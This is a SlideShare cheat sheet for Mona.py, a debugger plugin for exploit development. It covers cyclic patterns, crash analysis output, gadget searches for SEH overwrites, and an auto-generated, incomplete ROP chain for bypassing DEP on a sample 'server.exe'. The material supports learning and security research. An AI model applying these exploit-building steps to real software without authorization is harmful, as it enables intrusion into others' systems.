Mona cheatsheet
Download as TXT, PDF1 like5,987 views
This document provides a cheat sheet for using the Mona.py tool to analyze crashes and facilitate exploit development. It outlines commands for configuring Mona, searching for pointers and patterns in memory, finding code snippets, generating cyclic patterns, and automating ROP chain generation for bypassing DEP. The document explains how to use Mona to suggest exploit primitives after a crash, find useful gadgets like POP/POP/RET sequences, and provide starting points for ROP payloads.
![************************************************************************
*** After a crash with cyclic pattern payload **************************
************************************************************************
!mona suggest
Watch for output..
EIP overwritten with normal pattern : 0x37694136 (offset 260)
!!! %EBP+4
ESP (0x0018f574) points at offset 264 in normal pattern (length 736)
EBP overwritten with normal pattern : 0x69413569 (offset 256)
EBX (0x0018f580) points at offset 276 in normal pattern (length 724)
--- output ---
0BADF00D [+] Processing arguments and criteria
0BADF00D - Pointer access level : X
0BADF00D [+] Looking for cyclic pattern in memory
750F0000 Modules C:WindowsSystem32wshtcpip.dll
0BADF00D Cyclic pattern (normal) found at 0x0018f46c (length 1000
bytes)
0BADF00D Cyclic pattern (normal) found at 0x001c3961 (length 1000
bytes)
0BADF00D [+] Examining registers
0BADF00D EIP overwritten with normal pattern : 0x37694136 (offset 260)
0BADF00D ESP (0x0018f574) points at offset 264 in normal pattern
(length 736)
0BADF00D EBP overwritten with normal pattern : 0x69413569 (offset 256)
0BADF00D EBX (0x0018f580) points at offset 276 in normal pattern
(length 724)
0BADF00D [+] Examining SEH chain
0BADF00D [+] Examining stack
0BADF00D Pointer into normal cyclic pattern at ESP-0x1e8 (-488) :
0x0018f580 : offset 276, length 724
0BADF00D Pointer into normal cyclic pattern at ESP-0x19c (-412) :
0x001c396d : offset 12, length 988
0BADF00D Pointer into normal cyclic pattern at ESP-0x174 (-372) :
0x0018f46c : offset 0, length 1000
0BADF00D Pointer into normal cyclic pattern at ESP-0x170 (-368) :
0x001c396d : offset 12, length 988
0BADF00D Pointer into normal cyclic pattern at ESP-0x164 (-356) :
0x0018f580 : offset 276, length 724
0BADF00D Pointer into normal cyclic pattern at ESP-0x154 (-340) :
0x0018f56c : offset 256, length 744
0BADF00D Pointer into normal cyclic pattern at ESP-0x134 (-308) :
0x0018f580 : offset 276, length 724
0BADF00D Pointer into normal cyclic pattern at ESP-0x114 (-276) :
0x0018f46c : offset 0, length 1000
0BADF00D Pointer into normal cyclic pattern at ESP-0x110 (-272) :
0x0018f46c : offset 0, length 1000
0BADF00D Pointer into normal cyclic pattern at ESP-0x10c (-268) :
0x0018f580 : offset 276, length 724
0BADF00D [+] Preparing log file 'exploit.rb'
0BADF00D - (Re)setting logfile C:mona_logsexploit.rb
0BADF00D [+] Generating module info table, hang on...
0BADF00D - Processing modules
0BADF00D - Done. Let's rock 'n roll.
--- end of output ---](https://image.slidesharecdn.com/monacheatsheet-110812010338-phpapp02/85/Mona-cheatsheet-2-320.jpg)
![************************************************************************
*** Finding things in memory *******************************************
************************************************************************
!mona find
Find a sequence of bytes in memory.
Mandatory argument : -s <pattern> : the sequence to search for.
-type <type> : Type of pattern to search for : bin,asc,ptr,instr,file
-b <address> : the bottom of the search range
-t <address> : the top of the search range
-c : skip consecutive pointers but show length of the pattern instead
-p2p : show pointers to pointers to the pattern (might take a while !)
-r <number> : if p2p is used, you can tell the find to also find close
pointers by specifying -r with a value.
This value indicates the number of bytes to step
backwards for each search
!mona find -type instr -s "jmp ebx" -m ntdll.dll
--- output ---
Search into module ntdll.dll
Search for "jmp ebx" as assembly instruction
Result:
0x77e5172b (b+0x0007172b) : "jmp ebx" | {PAGE_EXECUTE_READ} [ntdll.dll]
ASLR: True, Rebase: True,
SafeSEH: True, OS: True,
v6.1.7600.16385 (C:WindowsSysWOW64ntdll.dll)
--- end of output ---
************************************************************************
*** Assemble instructions **********************************************
************************************************************************
!mona assemble -s "nop"
Return the opcode of specified instructions (chain with '#').
************************************************************************
*** Searching for 'POP/POP/RET' instruction (SEH exploiting) ***********
************************************************************************
!mona seh
Find POP POP RET instruction into program memory.
This statements could be used in SEH exploiting.
--- output ---
0BADF00D [+] Writing results to C:mona_logsseh.txt
0BADF00D - Number of pointers of type 'pop ebx # pop eax # ret ' : 3
0BADF00D - Number of pointers of type 'pop esi # pop edi # ret ' : 3
0BADF00D - Number of pointers of type 'pop ecx # pop ebx # ret ' : 1
0BADF00D - Number of pointers of type 'pop ebx # pop ebp # ret ' : 3
0BADF00D - Number of pointers of type 'pop ebx # pop eax # ret 04' : 2
0BADF00D - Number of pointers of type 'pop ebx # pop ecx # ret ' : 15
0BADF00D - Number of pointers of type 'pop ecx # pop edi # ret ' : 1
0BADF00D - Number of pointers of type 'pop ebx # pop ecx # ret 0c' : 1
0BADF00D - Number of pointers of type 'pop esi # pop ebx # ret ' : 6
0BADF00D - Number of pointers of type 'jmp dword ptr ss:[esp+14]' : 1
0BADF00D - Number of pointers of type 'pop esi # pop ebx # ret 08' : 2](https://image.slidesharecdn.com/monacheatsheet-110812010338-phpapp02/85/Mona-cheatsheet-3-320.jpg)
![0BADF00D - Number of pointers of type 'call dword ptr ss:[ebp-04]' : 1
0BADF00D - Number of pointers of type 'pop esi # pop ebx # ret 04' : 2
0BADF00D - Number of pointers of type 'call dword ptr ss:[esp+14]' : 1
0BADF00D - Number of pointers of type 'pop ebx # pop ecx # ret 04' : 14
0BADF00D - Number of pointers of type 'call dword ptr ss:[ebp-18]' : 1
0BADF00D - Number of pointers of type 'pop edi # pop ebx # ret ' : 1
[..]
--- end of output ---
************************************************************************
*** ROP based exploit *******************************
************************************************************************
!mona rop -m <NONASLRMODULES>
Analyze memory prepare several lists of ROP valid gadget (any INSTR + RET
sequence), stack pivots, rop functions,
Generate a ROP chain aimed to bypass DEP (call to VirtualProtect with PUSHAD
technique), and suggest wich address
need to be fixed for make it works.
NOTE:
Watch "C:mona_logsrop_suggestion.txt" for a clear gadget list.
Watch "C:mona_logsrop_virtualprotect.txt" for a starting point for
your rop payload (aimed to DEP bypass).
Watch "C:mona_logsstack_pivot.txt" for a list of gadget that permit
to change ESP.
--- output ---
---------- Mona command started on 2011-07-21 10:58:09 ----------
[..]
VirtualProtect register structure (PUSHAD technique)
----------------------------------------------------
EAX = NOP (0x90909090)
ECX = lpOldProtect (Writable ptr)
EDX = NewProtect (0x40)
EBX = Size
ESP = lPAddress (automatic)
EBP = ReturnTo (ptr to jmp esp - run '!mona jmp -r esp -
n -o')
ESI = ptr to VirtualProtect()
EDI = ROP NOP (RETN)
VirtualProtect() 'pushad' rop chain
------------------------------------
rop_gadgets =
[
0x00404880, # POP ECX # RETN (server.exe)
0x????????, # <- *&VirtualProtect()
0x00406a48, # MOV EAX,DWORD PTR DS:[ECX]
# ADD EAX,ECX # RETN (server.exe)
0x????????, # ** <- find routine to move
virtualprotect() into esi
# ** Hint : look for
mov [esp+offset],eax and pop esi
0x????????, # couldn't find a pointer to
put ptr to 'jmp esp' into ebp
0x????????, # <- put pointer to payload
here](https://image.slidesharecdn.com/monacheatsheet-110812010338-phpapp02/85/Mona-cheatsheet-4-320.jpg)
![0x00403e04, # POP EBX # RETN (server.exe)
0x00000201, # <- change size to mark as
executable if needed (-> ebx)
0x00404880, # POP ECX # RETN (server.exe)
0x00409000, # RW pointer (lpOldProtect)
(-> ecx)
0x00404be4, # POP EDI # RETN (server.exe)
0x00404be5, # ROP NOP (-> edi)
0x0040431c, # POP EDX # RETN (server.exe)
0x00000040, # newProtect (0x40) (-> edx)
0x00404a84, # POP EAX # RETN (server.exe)
0x90909090, # NOPS (-> eax)
0x004022e0, # PUSHAD # RETN (server.exe)
# rop chain generated by mona.py
# note : this chain may not work out of the box
# you may have to change order or fix some
gadgets,
# but it should give you a head start
].pack("V*")
[..]
--- end of output ---
===================================================================================
===
Reference:
https://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/
https://www.corelan.be/index.php/2011/05/12/hack-notes-ropping-eggs-for-
breakfast/](https://image.slidesharecdn.com/monacheatsheet-110812010338-phpapp02/85/Mona-cheatsheet-5-320.jpg)
Mona cheatsheet
- 1. =========================== A LITTLE MONA.PY CHEATSHEET =========================== Last Modify: 08/12/2011 Author: luca.mella@studio.unibo.it ************************************************************************ *** Configuration ****************************************************** ************************************************************************ !mona config -set workingfolder c:logs%p Set the current working directory. Mona will put output here. You might use -get alse for retrive current working folder. (%p means processname) -cm <option>=true/false safeseh aslr os rebase ************************************************************************ *** General searching options ****************************************** ************************************************************************ -cp <option>,<option> nonull unicode 00xx00yy ascii asciiprint upper lower uppernum lowernum numeric alphanum startswithnull 00xxyyzz -cpb <badchars> Exclude specified badchars from pointer search -p <N> Number of pointers to return -x <level> R,W,X,RW,RX,WX,RWX,* pointers that point to a segment with specified access level ************************************************************************ *** Pattern ************************************************************ ************************************************************************ !mona pc <size> Create a cyclic pattern of <size> bytes. Same of "msf_pattern" in metasploit !mona po <0x4bytes> find the offset of specified bytes in cyclic pattern
- 2. ************************************************************************ *** After a crash with cyclic pattern payload ************************** ************************************************************************ !mona suggest Watch for output.. EIP overwritten with normal pattern : 0x37694136 (offset 260) !!! %EBP+4 ESP (0x0018f574) points at offset 264 in normal pattern (length 736) EBP overwritten with normal pattern : 0x69413569 (offset 256) EBX (0x0018f580) points at offset 276 in normal pattern (length 724) --- output --- 0BADF00D [+] Processing arguments and criteria 0BADF00D - Pointer access level : X 0BADF00D [+] Looking for cyclic pattern in memory 750F0000 Modules C:WindowsSystem32wshtcpip.dll 0BADF00D Cyclic pattern (normal) found at 0x0018f46c (length 1000 bytes) 0BADF00D Cyclic pattern (normal) found at 0x001c3961 (length 1000 bytes) 0BADF00D [+] Examining registers 0BADF00D EIP overwritten with normal pattern : 0x37694136 (offset 260) 0BADF00D ESP (0x0018f574) points at offset 264 in normal pattern (length 736) 0BADF00D EBP overwritten with normal pattern : 0x69413569 (offset 256) 0BADF00D EBX (0x0018f580) points at offset 276 in normal pattern (length 724) 0BADF00D [+] Examining SEH chain 0BADF00D [+] Examining stack 0BADF00D Pointer into normal cyclic pattern at ESP-0x1e8 (-488) : 0x0018f580 : offset 276, length 724 0BADF00D Pointer into normal cyclic pattern at ESP-0x19c (-412) : 0x001c396d : offset 12, length 988 0BADF00D Pointer into normal cyclic pattern at ESP-0x174 (-372) : 0x0018f46c : offset 0, length 1000 0BADF00D Pointer into normal cyclic pattern at ESP-0x170 (-368) : 0x001c396d : offset 12, length 988 0BADF00D Pointer into normal cyclic pattern at ESP-0x164 (-356) : 0x0018f580 : offset 276, length 724 0BADF00D Pointer into normal cyclic pattern at ESP-0x154 (-340) : 0x0018f56c : offset 256, length 744 0BADF00D Pointer into normal cyclic pattern at ESP-0x134 (-308) : 0x0018f580 : offset 276, length 724 0BADF00D Pointer into normal cyclic pattern at ESP-0x114 (-276) : 0x0018f46c : offset 0, length 1000 0BADF00D Pointer into normal cyclic pattern at ESP-0x110 (-272) : 0x0018f46c : offset 0, length 1000 0BADF00D Pointer into normal cyclic pattern at ESP-0x10c (-268) : 0x0018f580 : offset 276, length 724 0BADF00D [+] Preparing log file 'exploit.rb' 0BADF00D - (Re)setting logfile C:mona_logsexploit.rb 0BADF00D [+] Generating module info table, hang on... 0BADF00D - Processing modules 0BADF00D - Done. Let's rock 'n roll. --- end of output ---
- 3. ************************************************************************ *** Finding things in memory ******************************************* ************************************************************************ !mona find Find a sequence of bytes in memory. Mandatory argument : -s <pattern> : the sequence to search for. -type <type> : Type of pattern to search for : bin,asc,ptr,instr,file -b <address> : the bottom of the search range -t <address> : the top of the search range -c : skip consecutive pointers but show length of the pattern instead -p2p : show pointers to pointers to the pattern (might take a while !) -r <number> : if p2p is used, you can tell the find to also find close pointers by specifying -r with a value. This value indicates the number of bytes to step backwards for each search !mona find -type instr -s "jmp ebx" -m ntdll.dll --- output --- Search into module ntdll.dll Search for "jmp ebx" as assembly instruction Result: 0x77e5172b (b+0x0007172b) : "jmp ebx" | {PAGE_EXECUTE_READ} [ntdll.dll] ASLR: True, Rebase: True, SafeSEH: True, OS: True, v6.1.7600.16385 (C:WindowsSysWOW64ntdll.dll) --- end of output --- ************************************************************************ *** Assemble instructions ********************************************** ************************************************************************ !mona assemble -s "nop" Return the opcode of specified instructions (chain with '#'). ************************************************************************ *** Searching for 'POP/POP/RET' instruction (SEH exploiting) *********** ************************************************************************ !mona seh Find POP POP RET instruction into program memory. This statements could be used in SEH exploiting. --- output --- 0BADF00D [+] Writing results to C:mona_logsseh.txt 0BADF00D - Number of pointers of type 'pop ebx # pop eax # ret ' : 3 0BADF00D - Number of pointers of type 'pop esi # pop edi # ret ' : 3 0BADF00D - Number of pointers of type 'pop ecx # pop ebx # ret ' : 1 0BADF00D - Number of pointers of type 'pop ebx # pop ebp # ret ' : 3 0BADF00D - Number of pointers of type 'pop ebx # pop eax # ret 04' : 2 0BADF00D - Number of pointers of type 'pop ebx # pop ecx # ret ' : 15 0BADF00D - Number of pointers of type 'pop ecx # pop edi # ret ' : 1 0BADF00D - Number of pointers of type 'pop ebx # pop ecx # ret 0c' : 1 0BADF00D - Number of pointers of type 'pop esi # pop ebx # ret ' : 6 0BADF00D - Number of pointers of type 'jmp dword ptr ss:[esp+14]' : 1 0BADF00D - Number of pointers of type 'pop esi # pop ebx # ret 08' : 2
- 4. 0BADF00D - Number of pointers of type 'call dword ptr ss:[ebp-04]' : 1 0BADF00D - Number of pointers of type 'pop esi # pop ebx # ret 04' : 2 0BADF00D - Number of pointers of type 'call dword ptr ss:[esp+14]' : 1 0BADF00D - Number of pointers of type 'pop ebx # pop ecx # ret 04' : 14 0BADF00D - Number of pointers of type 'call dword ptr ss:[ebp-18]' : 1 0BADF00D - Number of pointers of type 'pop edi # pop ebx # ret ' : 1 [..] --- end of output --- ************************************************************************ *** ROP based exploit ******************************* ************************************************************************ !mona rop -m <NONASLRMODULES> Analyze memory prepare several lists of ROP valid gadget (any INSTR + RET sequence), stack pivots, rop functions, Generate a ROP chain aimed to bypass DEP (call to VirtualProtect with PUSHAD technique), and suggest wich address need to be fixed for make it works. NOTE: Watch "C:mona_logsrop_suggestion.txt" for a clear gadget list. Watch "C:mona_logsrop_virtualprotect.txt" for a starting point for your rop payload (aimed to DEP bypass). Watch "C:mona_logsstack_pivot.txt" for a list of gadget that permit to change ESP. --- output --- ---------- Mona command started on 2011-07-21 10:58:09 ---------- [..] VirtualProtect register structure (PUSHAD technique) ---------------------------------------------------- EAX = NOP (0x90909090) ECX = lpOldProtect (Writable ptr) EDX = NewProtect (0x40) EBX = Size ESP = lPAddress (automatic) EBP = ReturnTo (ptr to jmp esp - run '!mona jmp -r esp - n -o') ESI = ptr to VirtualProtect() EDI = ROP NOP (RETN) VirtualProtect() 'pushad' rop chain ------------------------------------ rop_gadgets = [ 0x00404880, # POP ECX # RETN (server.exe) 0x????????, # <- *&VirtualProtect() 0x00406a48, # MOV EAX,DWORD PTR DS:[ECX] # ADD EAX,ECX # RETN (server.exe) 0x????????, # ** <- find routine to move virtualprotect() into esi # ** Hint : look for mov [esp+offset],eax and pop esi 0x????????, # couldn't find a pointer to put ptr to 'jmp esp' into ebp 0x????????, # <- put pointer to payload here
- 5. 0x00403e04, # POP EBX # RETN (server.exe) 0x00000201, # <- change size to mark as executable if needed (-> ebx) 0x00404880, # POP ECX # RETN (server.exe) 0x00409000, # RW pointer (lpOldProtect) (-> ecx) 0x00404be4, # POP EDI # RETN (server.exe) 0x00404be5, # ROP NOP (-> edi) 0x0040431c, # POP EDX # RETN (server.exe) 0x00000040, # newProtect (0x40) (-> edx) 0x00404a84, # POP EAX # RETN (server.exe) 0x90909090, # NOPS (-> eax) 0x004022e0, # PUSHAD # RETN (server.exe) # rop chain generated by mona.py # note : this chain may not work out of the box # you may have to change order or fix some gadgets, # but it should give you a head start ].pack("V*") [..] --- end of output --- =================================================================================== === Reference: https://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/ https://www.corelan.be/index.php/2011/05/12/hack-notes-ropping-eggs-for- breakfast/